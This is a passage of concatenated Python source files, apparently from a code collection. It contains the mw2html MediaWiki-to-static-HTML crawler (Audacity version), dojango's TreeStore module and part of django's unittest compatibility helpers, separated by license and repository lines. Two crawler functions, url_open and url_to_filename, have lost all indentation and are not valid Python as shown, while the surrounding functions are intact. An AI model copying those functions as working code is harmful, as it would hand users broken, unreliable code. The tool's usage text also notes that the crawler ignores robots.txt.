            # through and sliced doc[:-2], corrupting the document.  Skip
            # past the match instead, like clean_tag does.
            start_point = i2
            continue
        doc = doc[:i1] + doc[i2 + len(end_tag):]
def monobook_fix_html(doc, page_url):
    """
    Sets sidebar for Mediawiki 1.4beta6 Monobook HTML output.

    Strips navigation/search/edit chrome that makes no sense in a static
    dump; `config.special_mode` selects an alternative set of removals.
    """
    global config
    if config.made_by:
        # Tag the output as machine-generated, just before the <html> tag.
        doc = doc.replace('<html xmlns=', MADE_BY_COMMENT + '\n<html xmlns=')
    doc = remove_tag(doc, '<div class="portlet" id="p-personal">', '</div>', '<div')
    doc = remove_tag(doc, '<div id="p-search" class="portlet">', '</div>', '<div')
    doc = remove_tag(doc, '<div class="portlet" id="p-editors">', '</div>', '<div')
    doc = remove_tag(doc, '<div id=\'catlinks\' class=\'catlinks catlinks-allhidden\'>', '</div>', '<div')
    #James also remove the page/discussion/source/history/ div.
    doc = remove_tag(doc, '<li id="ca-', '</li>', '<li')
    #andre special mode
    if config.special_mode:
        # Remove ul list
        doc = remove_tag(doc, '<ul id="f-list">', '</ul>', '<ul')
        # Remove link rel alternate and edit
        doc = re.sub(r'<link rel="alternate"[\s\S]+?/>', r'', doc)
        doc = re.sub(r'<link rel="edit"[\s\S]+?/>', r'', doc)
        # Remove print footer
        doc = re.sub(r'<div class="printfooter">[\s\S]+?</div>', r'', doc)
        # Remove noexport
        doc = remove_tag(doc, '<div class="noexport"', '</div>', '<div')
        doc = remove_tag(doc, '<span class="noexport"', '</span>', '<span')
        # Remove editornote
        doc = remove_tag(doc, '<div class="editornote"', '</div>', '<div')
    else:
        # Remove powered by MediaWiki logo
        doc = re.sub(
            r'<div id="f-poweredbyico">[\s\S]+?(<ul id="f-list">)',
            r'\1', doc)
        # Remove page has been accessed X times list item.
        doc = re.sub(r'<li id="f-viewcount">[\s\S]+?</li>', r'', doc)
        # Remove disclaimers list item.
        doc = re.sub(r'<li id="f-disclaimer">[\s\S]+?</li>', r'', doc)
    # Remove edit links
    doc = remove_tag(doc, '<div class="editsection"', '</div>', '<div')
    doc = remove_tag(doc, '<span class="editsection"', '</span>', '<span')
    return doc
def pre_html_transform(doc, url):
    """
    User-customizable HTML transform.

    Given an HTML document (with URLs already rewritten), returns
    modified HTML document.  Applied before URL extraction; dispatches on
    the configured skin and cleanup flags.
    """
    global config
    if config.hack_skin:
        if config.skin == MONOBOOK_SKIN:
            doc = monobook_fix_html(doc, url)
            if not config.special_mode:
                doc = monobook_hack_skin_html(doc)
        else:
            raise ValueError('unknown skin')
    if config.move_href:
        doc = fix_move_href_tags(doc)
    if config.remove_history:
        doc = html_remove_image_history(doc)
    # Translation-flag links are always dropped.
    doc = html_remove_translation_links(doc)
    return doc
def pos_html_transform(doc, url):
    """
    Post-parse HTML transform: inject the sidebar and footer fragments
    and drop leftovers that only make sense online.  Runs after URL
    rewriting so the injected fragments keep their own links untouched.
    """
    global footer_text, config, sidebar_html
    url = normalize_url(url, False)
    # Add sidebar.html
    if config.sidebar != None and sidebar_html == '':
        # Lazily read and cache the sidebar fragment on first use.
        f = open(config.sidebar, 'rU')
        sidebar_html = f.read()
        f.close()
    doc = re.sub(r'(<!-- end of the left \(by default at least\) column -->)', sidebar_html + r'\1', doc)
    # Remove empty links
    doc = clean_tag(doc, 'href=""', '</a>', '<a ');
    if config.special_mode:
        # Remove external link rel stylesheet
        doc = re.sub(r'<link rel="stylesheet" href="http://[\s\S]+?/>', r'', doc)
        # Remove external javascript
        doc = re.sub(r'<script type="text/javascript" src="http://[\s\S]+?</script>', r'', doc)
    # Replace remaining text with footer, if available (this needs to be done after parse_html to avoid rewriting of urls
    if config.footer is not None:
        s1 = '<div id="footer">'
        # match correct divs
        (i1, i2) = find_tag_limits(doc, s1, '</div>', '<div')
        if (i1 == -1):
            return doc
        if footer_text == '':
            # Lazily read and cache the footer fragment on first use.
            f = open(config.footer, 'rU')
            footer_text = f.read()
            f.close()
        # add static dump time
        footer_html = footer_text.replace('%DATE%', strftime("%Y-%m-%d"))
        # add online url
        footer_html = footer_html.replace('%ONLINEURL%', url)
        if config.special_mode:
            # keep MediaWiki credits
            doc = doc[:i2] + footer_html + doc[i2:]
        else:
            doc = doc[:i1 + len(s1)] + footer_html + doc[i2:]
    return doc
def fix_move_href_tags(doc):
    """
    Return copy of doc with all MOVE_HREF tags removed.

    The href attribute given on the <movehref> tag is pushed down onto
    every link inside it; a <movehref> with no href removes inner links.
    """
    while '<' + MOVE_HREF in doc:
        # Bounds of the <movehref ...> ... </movehref> region.
        i1 = doc.index('<' + MOVE_HREF)
        i2 = doc.index('</' + MOVE_HREF, i1 + 1)
        i3 = doc.index('>', i2 + 1)
        (start, end) = (i1, i3 + 1)
        tags = htmldata.tagextract(doc[start:end])
        assert tags[0][0] == MOVE_HREF
        assert tags[-1][0] == '/' + MOVE_HREF
        href = tags[0][1].get('href', '')
        new_tags = []
        # Keep everything between the movehref tags, rewriting hrefs.
        for tag in tags[1:-1]:
            if len(tag) == 2:
                if 'href' in tag[1]:
                    if href == '':
                        # No target href: drop the link tag entirely.
                        continue
                    tag[1]['href'] = href
            new_tags += [tag]
        doc = doc[:start] + htmldata.tagjoin(new_tags) + doc[end:]
    return doc
def html_remove_image_history(doc):
    """
    Strip the 'Image history' and 'Image links' sections (heading through
    the closing </ul>) from *doc*.
    """
    for heading in ('Image history', 'Image links'):
        doc = re.sub(r'<h2>' + heading + r'</h2>[\s\S]+?</ul>', r'', doc)
    return doc
def html_remove_translation_links(doc):
    """
    Remove translation links (the international flags).

    Links are recognized by a 2-letter (/xx/) or 4-letter (/xx_yy/)
    language-code component in the URL; each matched anchor is replaced
    by a marker comment.
    """
    flag_patterns = (
        (r'<a href="[^"]+/[\s\S][\s\S][/"][\s\S]+?</a>',
         r'<!--Removed Translation Flag-->'),
        (r'<a href="[^"]+/[\s\S][\s\S]_[\s\S][\s\S][/"][\s\S]+?</a>',
         r'<!--Removed Translation Flag2-->'),
    )
    for pattern, marker in flag_patterns:
        doc = re.sub(pattern, marker, doc)
    return doc
def monobook_hack_skin_html(doc):
    """
    Hacks Monobook HTML output: switch to the hacked CSS ids defined by
    monobook_hack_skin_css and append a trailing <br> before </body>.
    """
    replacements = (
        ('<div id="globalWrapper">', '<div id="globalWrapperHacked">'),
        ('<div id="footer">', '<div id="footerHacked">'),
        ('</body>', '<br></body>'),
    )
    for old, new in replacements:
        doc = doc.replace(old, new)
    return doc
def monobook_hack_skin_css(doc, url):
    """
    Hacks Mediawiki 1.4beta6 Monobook main CSS file for better looks.

    Removes flower background. Defines *Hacked CSS ids, so we can add
    an orange bar at the top, and clear the orange bar right above the
    footer.  Only applies to the monobook/main.css stylesheet; any other
    URL is returned unchanged.
    """
    global config
    if not url.endswith('monobook/main.css'):
        return doc
    doc = "/* Monobook skin automatically modified by mw2html. */" + doc
    doc = doc.replace('url("headbg.jpg")', '')
    doc += """
    /* Begin hacks by mw2html */
    #globalWrapperHacked {
    font-size:127%;
    width: 100%;
    background-color: White;
    border-top: 1px solid #fabd23;
    border-bottom: 1px solid #fabd23;
    margin: 0.6em 0em 1em 0em;
    padding: 0em 0em 1.2em 0em;
    }
    #footerHacked {
    background-color: White;
    margin: 0.6em 0em 0em 0em;
    padding: 0.4em 0em 0em 0em;
    text-align: center;
    font-size: 90%;
    }
    #footerHacked li {
    display: inline;
    margin: 0 1.3em;
    }
    """
    # The stock stylesheet must contain this rule; fail loudly if the
    # MediaWiki version changed it.
    c1 = '#column-one { padding-top: 160px; }'
    c2 = '#column-one { padding-top: 3.0em; }'
    assert c1 in doc
    doc = doc.replace(c1, '/* edit by mw2html */\n' + c2 +
                      '\n/* end edit by mw2html */\n')
    # Remove external link icons.
    if config.remove_png:
        doc = re.sub(r'#bodyContent a\[href \^="http://"\][\s\S]+?\}', r'', doc)
    return doc
def post_css_transform(doc, url):
    """
    User-customizable CSS transform.

    Given a CSS document (with URLs already rewritten), returns
    modified CSS document.  Skin hacking is skipped in special mode.
    """
    global config
    if config.hack_skin and not config.special_mode:
        if config.skin == MONOBOOK_SKIN:
            doc = monobook_hack_skin_css(doc, url)
        else:
            raise ValueError('unknown skin')
    return doc
def move_to_index_if_needed(ans):
    """If *ans* ends with the configured index page name, rename that
    trailing component to index.html."""
    global config
    if ans.endswith(config.index):
        ans = ans[:len(ans) - len(config.index)] + INDEX_HTML
    return ans
def file_exists_in_written_set(filename):
    """True if *filename* was already written out this run (compared in
    the same normcased/normalized form used when recording writes)."""
    return os.path.normcase(os.path.normpath(filename)) in wrote_file_set
def find_unused_filename(filename, exists=os.path.exists):
    """
    Return 'file' if 'file' doesn't exist, otherwise 'file1', 'file2', etc.

    The numeric suffix is inserted before the extension.  Existence is
    determined by the callable *exists*, which takes a filename and
    returns a boolean.
    """
    if not exists(filename):
        return filename
    (dirname, basename) = os.path.split(filename)
    (stem, ext) = os.path.splitext(basename)
    counter = 1
    while True:
        candidate = os.path.join(dirname, '%s%d%s' % (stem, counter, ext))
        if not exists(candidate):
            return candidate
        counter += 1
def clean_filename(url, ans):
    """
    Sanitize the part of *ans* below config.outdir: percent escapes and
    dashes become underscores, runs of underscores collapse, and math
    thumbnail names are shortened to a hash-based name.
    """
    # Split outdir and our file/dir under outdir
    # (Note: ans may not be a valid filename)
    global config
    (par, ans) = (ans[:len(config.outdir)], ans[len(config.outdir):])
    if ans.startswith(os.sep):
        ans = ans[1:]
    # Replace % escape codes with underscores, dashes with underscores.
    while '%%' in ans:
        ans = ans[:ans.index('%%')] + '_' + ans[ans.index('%%') + 2:]
    # '%25xy' is the URL-encoding of an escaped '%xy'; drop all 5 chars.
    while '%25' in ans:
        ans = ans[:ans.index('%25')] + '_' + ans[ans.index('%25') + 5:]
    # NOTE(review): assumes every remaining '%' starts a 3-char '%xy'
    # escape; a bare '%' near the end of the name would be mis-sliced --
    # confirm inputs are always properly quoted.
    while '%' in ans:
        ans = ans[:ans.index('%')] + '_' + ans[ans.index('%') + 3:]
    ans = ans.replace('-', '_')
    while '__' in ans:
        ans = ans.replace('__', '_')
    while '_.' in ans:
        ans = ans.replace('_.', '.')
    # Rename math thumbnails
    if '/math/' in url:
        tail = os.path.split(ans)[1]
        if os.path.splitext(tail)[1] == '.png':
            tail = os.path.splitext(tail)[0]
            # MediaWiki math thumbs are 32-char hex names; shorten them.
            if set(tail) <= set('0123456789abcdef') and len(tail) == 32:
                ans = 'math_' + hashlib.md5(tail).hexdigest()[:4] + '.png'
    return os.path.join(par, ans)
def flatten_filename(url, filename):
    """
    Flatten *filename* so it lives directly under config.outdir.

    Only the last path component is kept (its parent directory name for
    dir/index.html files), and the original extension is preserved.
    """
    global config
    # Bug fix (cleanup): a nested `get_fullname` helper was defined here
    # but never called anywhere; it was dead code and has been removed.
    orig_ext = os.path.splitext(filename)[1]
    (head, tail) = os.path.split(filename)
    if tail == INDEX_HTML:
        # Directory URLs are stored as dir/index.html; use the dir name.
        (head, tail) = os.path.split(head)
    ans = tail
    if os.path.splitext(ans)[1] != orig_ext:
        ans = os.path.splitext(ans)[0] + orig_ext
    return os.path.join(config.outdir, ans)
def split_section(url):
    """
    Splits into (head, tail), where head contains no '#' and is max length.

    tail is the '#' plus the section name, or '' when *url* has no
    section part.
    """
    (head, sep, rest) = url.partition('#')
    return (head, sep + rest)
def url_open(url):
# download a file and retrieve its content and mimetype
global conn, domain, counter, redir_cache, errors
l_redir = []
redirect = url
while redirect != '':
l_redir += [url]
L = urlparse.urlparse(url)
if L[1] != domain:
conn.close()
print "connection to", domain, "closed."
conn = httplib.HTTPConnection(L[1])
domain = L[1]
print "connection to", domain, "opened."
rel_url = url
pos = url.find(domain)
if pos != -1:
rel_url = url[pos + len(domain):]
attempts = 0
#number of attempts
total_attempts = 3
recovered = False
success = False
while not success and attempts < total_attempts:
#increment httplib requests counter
counter += 1
try:
conn.request("GET", rel_url)
r = conn.getresponse()
print 'Status', r.status, r.reason, 'accessing', rel_url
if r.status == 404:
print " it's not possible to recover this error."
errors += 1
return ('', '')
if r.status == 500:
print " eventually this error might be recovered. let's try again."
print ' reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
continue
if r.status == 403:
print " that shouldn't happen, but let's try again anyway."
print ' reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
continue
if attempts != 0:
recovered = True
if r.status != 200:
print " Status other than 200, 404, 500, 403. It is: ", r.status
success = True
except httplib.HTTPException, e:
print 'ERROR', e.__class__.__name__, 'while retrieving', url
conn.close
if e.__class__.__name__ in ['BadStatusLine', 'ImproperConnectionState', 'NotConnected', 'IncompleteRead', 'ResponseNotReady']:
print "eventually this error might be recovered. let's try again."
print 'reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
else:
print "it's not possible to recover this error."
errors += 1
return ('', '')
if recovered:
print "error recovered"
if not success:
print "it was not possible to recover this error."
errors += 1
return ('', '')
redirect = r.getheader('Location', '').split(';')[0]
if redirect != "":
url = redirect
else:
doc = r.read()
for item in l_redir:
redir_cache[normalize_url(item)] = normalize_url(url)
mimetype = r.getheader('Content-Type', '').split(';')[0].lower()
return (doc, mimetype)
def url_to_filename(url):
"""
Translate a full url to a full filename (in local OS format) under outdir.
Transforms web url into local url and caches it.
Downloads the file to disk and works with it there instead of download the same file two times (Performance Improvement).
"""
global config
nurl = normalize_url(url)
if nurl in url_filename_cache:
return url_filename_cache[nurl]
#ParseResult(scheme='http', netloc='www.cwi.nl:80', path='/%7Eguido/Python.html', params='', query='', fragment='')
turl = re.sub(r'm/index.php\?title=', r'man/', nurl)
turl = re.sub(r'.css&[\S\s]+', r'.css', turl)
L = list(urlparse.urlparse(turl))
#this way the url will not create a folder outside of the maindomain
droot = get_domain(config.rooturl)
if (L[1] != droot):
L[1] = droot
L[2] = L[2].strip('/')
lpath = L[2].split('/')
if not '.' in lpath[-1]:
# url ends with a directory name. Store it under index.html.
# L[2] += '/' + INDEX_HTML
L[2]=L[2]
else:
# 'title=' parsing
if L[4].startswith('title=') and L[2].endswith('index.php'):
L[4] = L[4][len('title='):]
L[2] = L[2][:-len('index.php')]
if lpath[-1]=='man':
L[2] = INDEX_HTML
if lpath[-1].lower().startswith( 'quick_help'):
L[2] = QHELP_HTML
L[3] = ''
L[2] = L[2].strip('/')
#don't sanitize / for path
L[0] = ''
L[2] = urllib.quote_plus(L[2], '/')
L[3] = urllib.quote_plus(L[3])
L[4] = urllib.quote_plus(L[4])
L[5] = urllib.quote_plus(L[5])
# Local filename relative to outdir
# os.sep - O.S. directory separator
# (More transformations are made to this below...).
FL = []
for i in L:
if i != '':
FL += [i]
subfile = os.sep.join(FL)
(doc, mimetype) = url_open(url)
if doc == '' or mimetype == '':
url_filename_cache[nurl] = ''
return ''
# Fix up extension based on mime type.
# Maps mimetype to file extension
MIME_MAP = {
'image/jpeg': 'jpg', 'image/png': 'png', 'image/gif': 'gif',
'image/tiff': 'tiff', 'text/plain': 'txt', 'text/html': 'html',
'text/rtf': 'rtf', 'text/css': 'css', 'text/sgml': 'sgml',
'text/xml': 'xml', 'application/zip': 'zip'
}
if mimetype in MIME_MAP:
(root, ext) = os.path.splitext(subfile)
ext = '.' + MIME_MAP[mimetype]
subfile = root + ext
subfile = subfile.lower()
ans = os.path.join(config.outdir, subfile)
if config.flatten:
ans = flatten_filename(nurl, ans)
if config.clean:
ans = clean_filename(nurl, ans)
if config.index != None:
ans = move_to_index_if_needed(ans)
ans = find_unused_filename(ans, file_exists_in_written_set)
# Cache and return answer.
wrote_file_set.add(os.path.normcase(os.path.normpath(ans)))
url_filename_cache[nurl] = ans
mode = ['wb', 'w'][mimetype.startswith('text')]
# Make parent directory if it doesn't exist.
try:
os.makedirs(os.path.split(ans)[0])
except OSError, e:
if e.errno != errno.EEXIST:
raise
# Not really needed since we checked that the directory
# outdir didn't exist at the top of run(), but let's double check.
if os.path.exists(ans) and not config.overwrite:
out.write('File already exists: ' + str(ans)) #@UndefinedVariable
sys.exit(1)
f = open(ans, mode)
f.write(doc)
f.close()
return ans
def url_to_relative(url, cururl):
    """
    Translate a full url to a filename (in URL format) relative to cururl.

    Returns '' when *url* could not be downloaded, and '#' when the
    relative link would otherwise be empty (self-link).  Any #section on
    *url* is re-attached to the result.
    """
    cururl = split_section(cururl)[0]
    (url, section) = split_section(url)
    target = url_to_filename(url)
    # Bug fix: the old code split first and then compared the resulting
    # LIST against '' (`L1 == ''`), which is always False, so failed
    # downloads were never detected here.  Test the filename itself.
    if target == '':
        return ''
    L1 = target.replace(os.sep, '/').strip('/').split('/')
    L2 = url_to_filename(cururl).replace(os.sep, '/').strip('/').split('/')
    # Drop the common leading path components shared by both files.
    while L1 != [] and L2 != [] and L1[0] == L2[0]:
        L1 = L1[1:]
        L2 = L2[1:]
    rel_url = urllib.quote('../' * (len(L2) - 1) + '/'.join(L1)) + section
    if rel_url == '':
        return '#'
    else:
        return rel_url
def parse_css(doc, url):
    """
    Returns (modified_doc, new_urls), where new_urls are absolute URLs for
    all links found in the CSS.  Links are rewritten in-place to relative
    local paths before the document is reassembled.
    """
    global config
    new_urls = []
    L = htmldata.urlextract(doc, url, 'text/css')
    for item in L:
        # Store url locally.
        u = item.url
        if config.no_images and any(u.strip().lower().endswith(suffix) for suffix in ('.jpg', '.gif', '.png', '.ico')):
            # In no-images mode drop the reference entirely.
            item.url = ''
            continue
        new_urls += [u]
        item.url = url_to_relative(u, url)
    newdoc = htmldata.urljoin(doc, L)
    newdoc = post_css_transform(newdoc, url)
    return (newdoc, new_urls)
def should_follow(url):
    """
    Returns a boolean for whether url should be spidered

    Given that 'url' was linked to from site, return whether
    'url' should be spidered as well.  Filters by domain, query
    complexity, forbidden wiki namespaces, media/archive suffixes and the
    limit_parent scope rule.
    """
    global config
    # we don't have search on the local version
    if (url.endswith('#searchInput')):
        return False
    # False if different domains.
    nurl = normalize_url(url)
    droot = get_domain(config.rooturl)
    dn = get_domain(nurl)
    if droot != dn and not (dn.endswith(droot) or droot.endswith(dn)):
        if config.debug:
            print url, 'not in the same domain'
        return False
    # False if multiple query fields or parameters found
    if (url.count('&') >= 1 or url.count(';') > 0) and not any(x in url for x in ('.css', 'gen=css')):
        if config.debug:
            print url, 'with multiple query fields'
        return False
    # Skip MediaWiki meta/namespace pages and edit links.
    if any(x in url for x in ('Special:', 'Image:', 'Talk:', 'User:', 'Help:', 'User_talk:', 'MediaWiki_talk:', 'File:', 'action=edit', 'title=-')):
        if config.debug:
            print url, 'is a forbidden wiki page'
        return False
    if config.no_images and any(url.strip().lower().endswith(suffix) for suffix in ('.jpg', '.gif', '.png', '.ico')):
        if config.debug:
            print url, 'is a image and you are in no-images mode'
        return False
    if any(url.strip().lower().endswith(suffix) for suffix in ('.zip', '.7z')):
        if config.debug:
            print url, 'is a compressed file'
        return False
    # limit_parent support
    ncurl = normalize_url(config.rooturl)
    if config.limit_parent and not nurl.startswith(ncurl):
        L = nurl.split('/')
        if ('.' not in L[-1]):
            if config.debug:
                print url, 'is a file outside of scope with unknown extension'
            return False
        # JKC: we do allow css from 'strange' places.
        if '.css' in L[-1]:
            return True
        forbidden_parents = ['.php', '.html', '.htm']
        for fp in forbidden_parents:
            if fp in L[-1]:
                if config.debug:
                    print url, 'is a page outside of scope'
                return False
    return True
def parse_html(doc, url):
    """
    Returns (modified_doc, new_urls), where new_urls are absolute URLs for
    all links we want to spider in the HTML.  Followed links are rewritten
    to relative local paths; everything else is kept as-is.
    """
    global config
    # Random markers make it unlikely the replacement strings collide
    # with real document content.
    BEGIN_COMMENT_REPLACE = '<BEGINCOMMENT-' + str(random.random()) + '>'
    END_COMMENT_REPLACE = '<ENDCOMMENT-' + str(random.random()) + '>'
    new_urls = []
    doc = pre_html_transform(doc, url)
    # Temporarily "get rid" of comments so htmldata will find the URLs
    # in the funky "<!--[if" HTML hackery for IE.
    doc = doc.replace('<!--', BEGIN_COMMENT_REPLACE)
    doc = doc.replace('-->', END_COMMENT_REPLACE)
    L = htmldata.urlextract(doc, url, 'text/html')
    # in this code we change each absolute url in L
    # into a relative one.
    # we also kick-off zillions of subthreads to collect
    # more pages.
    for item in L:
        u = item.url
        follow = should_follow(u)
        if follow:
            if config.debug:
                print 'ACCEPTED - ', u
            # Store url locally.
            new_urls += [u]
            item.url = url_to_relative(u, url)
        else:
            # James, let's keep everything by default (but not follow it).
            # if not any( license in u for license in ('creativecommons.org', 'wxwidgets.org', 'gnu.org', 'mediawiki.org') ):
            #     item.url = ''
            if config.debug:
                print 'NOT INCLUDED - ', u
    newdoc = htmldata.urljoin(doc, L)
    newdoc = newdoc.replace(BEGIN_COMMENT_REPLACE, '<!--')
    newdoc = newdoc.replace(END_COMMENT_REPLACE, '-->')
    newdoc = pos_html_transform(newdoc, url)
    return (newdoc, new_urls)
def run(out=sys.stdout):
    """
    Code interface.

    Breadth-style crawl starting at config.rooturl: every pending URL is
    downloaded (url_to_filename), parsed for further links, rewritten and
    saved back to disk.  Progress and totals are reported on *out*.
    """
    global conn, domain, counter, redir_cache, config
    if urlparse.urlparse(config.rooturl)[1].lower().endswith('wikipedia.org'):
        out.write('Please do not use robots with the Wikipedia site.\n')
        out.write('Instead, install the Wikipedia database locally and use mw2html on\n')
        out.write('your local installation. See the Mediawiki site for more information.\n')
        sys.exit(1)
    # Number of files saved
    n = 0
    if not config.overwrite and os.path.exists(config.outdir):
        out.write('Error: Directory exists: ' + str(config.outdir))
        sys.exit(1)
    domain = get_domain(config.rooturl)
    conn = httplib.HTTPConnection(domain)
    print 'connection established to:', domain
    complete = set()
    pending = set([config.rooturl])
    start = True
    while len(pending) > 0:
        url = pending.pop()
        nurl = normalize_url(url)
        # Resolve known redirects before the visited-set check.
        if nurl in redir_cache:
            nurl = redir_cache[nurl]
        if nurl in complete:
            if config.debug:
                print url, 'already processed'
            continue
        complete.add(nurl)
        filename = url_to_filename(url)
        #this is needed for the first path as it doesn't know if it is a redirect or not in the begining
        #at this point all the content of redir_cache is relative to the start path
        if start:
            start = False
            aux_url = ''
            for redir in redir_cache.iterkeys():
                aux_url = normalize_url(redir)
                url_filename_cache[aux_url] = filename
                if aux_url not in complete:
                    complete.add(aux_url)
            if aux_url != '':
                nurl = normalize_url(redir_cache[nurl])
        if filename == '':
            continue
        if not os.path.exists(filename):
            print "ERROR: ", url, '\n'
            continue
        f = open(filename, 'r')
        doc = f.read()
        f.close()
        new_urls = []
        # Only HTML and CSS documents are parsed for further links.
        if filename.endswith('.html'):
            (doc, new_urls) = parse_html(doc, url)
        elif filename.endswith('.css'):
            (doc, new_urls) = parse_css(doc, url)
        # Save document changes to disk
        # The unmodified file already exists on disk.
        update = False
        text_ext = ('txt', 'html', 'rtf', 'css', 'sgml', 'xml')
        for ext in text_ext:
            if filename.endswith(ext):
                update = True
                break
        if update:
            f = open(filename, 'w')
            f.write(doc)
            f.close()
        if config.debug:
            out.write(url + '\n => ' + filename + '\n\n')
        n += 1
        # Enqueue URLs that we haven't yet spidered.
        for u in new_urls:
            if normalize_url(u) not in complete:
                # Strip off any #section link.
                if '#' in u:
                    u = u[:u.index('#')]
                pending.add(u)
    conn.close()
    print "connection to", domain, "closed."
    out.write(str(n) + ' files saved\n')
    print counter, "httplib requests done"
    print errors, "errors not recovered"
def usage():
    """
    Print command line options.

    The help text is kept in a single triple-quoted string and dedented
    for display; exits with status 1.
    """
    usage_str = """
    mw2html url outdir [options]
    MW2HTML Audacity version
    Converts an entire Mediawiki site into static HTML.
    WARNING: This is a recursive robot that ignores robots.txt. Use with care.
    url - URL of mediawiki page to convert to static HTML.
    outdir - Output directory.
    -f, --force - Overwrite existing files in outdir.
    -d, --debug - Debug mode.
    -s, --special-mode - -f --no-flatten --limit-parent -l sidebar.html
    -b footer.html, keeps MediaWiki icon and more
    design changes.
    --no-flatten - Do not flatten directory structure.
    --no-clean - Do not clean up filenames (clean replaces
    non-alphanumeric chars with _, renames math thumbs).
    --no-hack-skin - Do not modify skin CSS and HTML for looks.
    --no-made-by - Suppress "generated by" comment in HTML source.
    --no-move-href - Disable <movehref> tag. [1]
    --no-remove-png - Retain external link PNG icons.
    --no-remove-history - Retain image history and links to information.
    --no-images - Discard images
    --limit-parent - Do not explore .php pages outside the url path
    (outside css, images and other files aren't affected)
    -l, --left=a.html - Paste HTML fragment file into left sidebar.
    -t, --top=a.html - Paste HTML fragment file into top horiz bar.
    -b, --bottom=a.html - Paste HTML fragment file into footer horiz bar.
    -i, --index=filename - Move given filename in outdir to index.html.
    Example Usage:
    mw2html http://127.0.0.1/mywiki/ out -f -i main_page.html -l sidebar.html
    Freezes wiki into 'out' directory, moves main_page.html => index.html,
    assumes sidebar.html is defined in the current directory.
    [1]. The <movehref> tag.
    Wiki syntax: <html><movehref href="a"></html>...<html></movehref></html>.
    When enabled, this tag will cause all href= attributes inside of it to be
    set to the given location. This is useful for linking images.
    In MediaWiki, for the <html> tag to work, one needs to enable $wgRawHtml
    and $wgWhitelistEdit in LocalSettings.php. A <movehref> tag with no href
    field will remove all links inside it.
    """
    print textwrap.dedent(usage_str.strip('\n'))
    sys.exit(1)
def main():
    """
    Command line interface: parse options into the global Config, then run().
    """
    global config
    try:
        (opts, args) = getopt.gnu_getopt(sys.argv[1:], 'fsdl:t:b:i:',
                       ['force', 'no-flatten', 'no-clean',
                        'no-hack-skin', 'no-made-by', 'left=',
                        'top=', 'bottom=', 'index=', 'no-move-href',
                        'no-remove-png', 'no-remove-history', 'limit-parent',
                        'special-mode', 'debug', 'no-images'])
    except getopt.GetoptError:
        usage()
    # Parse non-option arguments
    try:
        (rooturl, outdir) = args
    except ValueError:
        usage()
    config = Config(rooturl=rooturl, outdir=outdir)
    # Parse option arguments.
    # Bug fix: the long form used to be listed as '-special-mode' (single
    # dash) in every membership test below, but getopt reports long
    # options with a leading '--', so `--special-mode` on the command
    # line silently did nothing; only '-s' worked.
    for (opt, arg) in opts:
        if opt in ['-f', '--force', '-s', '--special-mode']:
            config.overwrite = True
        if opt in ['--no-flatten', '-s', '--special-mode']:
            config.flatten = False
        if opt in ['--no-clean']:
            config.clean = False
        if opt in ['--no-hack-skin']:
            config.hack_skin = False
        if opt in ['--no-made-by']:
            config.made_by = False
        if opt in ['--no-move-href']:
            config.move_href = False
        if opt in ['--no-remove-png']:
            config.remove_png = False
        if opt in ['--no-remove-history']:
            config.remove_history = False
        if opt in ['--no-images']:
            config.no_images = True
        if opt in ['--limit-parent', '-s', '--special-mode']:
            config.limit_parent = True
        if opt in ['-s', '--special-mode']:
            config.special_mode = True
            config.sidebar = 'sidebar.html'
            config.footer = 'footer.html'
        if opt in ['-d', '--debug']:
            config.debug = True
        if opt in ['-l', '--left']:
            config.sidebar = os.path.abspath(arg)
        if opt in ['-t', '--top']:
            # Top bar injection is not implemented yet.
            raise NotImplementedError
            config.header = os.path.abspath(arg)
        if opt in ['-b', '--bottom']:
            config.footer = os.path.abspath(arg)
        if opt in ['-i', '--index']:
            config.index = arg
    # Run program
    run()
| gpl-2.0 |
rubendario25/dojango | dojango/data/modelstore/treestore.py | 12 | 1656 | from stores import Store
from fields import StoreField
from methods import BaseMethod
class ChildrenMethod(BaseMethod):
    """ A method proxy that will resolve the children
        of a model that has a tree structure.

        "django-treebeard" and "django-mptt" both attach a get_children method
        to the model.
    """
    def get_value(self):
        # The store and the current model instance are injected through
        # proxied_args by the surrounding store machinery.
        store = self.field.proxied_args['StoreArg']
        obj = self.field.proxied_args['ObjectArg']
        ret = []
        # TODO: optimize using get_descendants()
        if hasattr(obj, "get_children"):
            # Serialize the children recursively with a nested store of
            # the same class as the parent store.
            ret = store.__class__(objects=obj.get_children(), is_nested=True).to_python()
        return ret
class ChildrenField(StoreField):
    """ A field that renders children items

        If your model provides a get_children method you can use that field
        to render all children recursively.
        (see "django-treebeard", "django-mptt")
    """
    def get_value(self):
        # Bind a ChildrenMethod to this field and invoke it to resolve
        # the children of the current object.
        self._get_value = ChildrenMethod(self.model_field_name)
        self._get_value.field = self
        return self._get_value()
class TreeStore(Store):
    """ A store that already includes the children field with no additional
        options. Just subclass that Store, add the to-be-rendered fields and
        attach a django-treebeard (or django-mptt) model to its Meta class:

        class MyStore(TreeStore):
            username = StoreField()
            first_name = StoreField()

            class Meta:
                objects = YourTreeModel.objects.filter(id=1) # using treebeard or mptt
                label = 'username'
    """
    # Pre-wired recursive children serialization; see ChildrenField.
    children = ChildrenField()
purpleidea/macaronic-net | django/utils/unittest/compatibility.py | 575 | 2096 | import os
import sys
try:
    from functools import wraps
except ImportError:
    # only needed for Python 2.4
    def wraps(_):
        # No-op stand-in: returns the wrapped function unchanged
        # (no __name__/__doc__ metadata copying).
        def _wraps(func):
            return func
        return _wraps
__unittest = True
def _relpath_nt(path, start=os.path.curdir):
    """Return a relative version of a path"""
    # Windows variant: comparisons are case-insensitive and UNC shares
    # and drive letters must match between path and start.
    # NOTE(review): os.path.splitunc is Python-2-only; this branch cannot
    # run unchanged on Python 3.
    if not path:
        raise ValueError("no path specified")
    start_list = os.path.abspath(start).split(os.path.sep)
    path_list = os.path.abspath(path).split(os.path.sep)
    if start_list[0].lower() != path_list[0].lower():
        unc_path, rest = os.path.splitunc(path)
        unc_start, rest = os.path.splitunc(start)
        if bool(unc_path) ^ bool(unc_start):
            raise ValueError("Cannot mix UNC and non-UNC paths (%s and %s)"
                                                                % (path, start))
        else:
            raise ValueError("path is on drive %s, start on drive %s"
                                                % (path_list[0], start_list[0]))
    # Work out how much of the filepath is shared by start and path.
    for i in range(min(len(start_list), len(path_list))):
        if start_list[i].lower() != path_list[i].lower():
            break
    else:
        i += 1
    rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
    if not rel_list:
        return os.path.curdir
    return os.path.join(*rel_list)
# default to posixpath definition
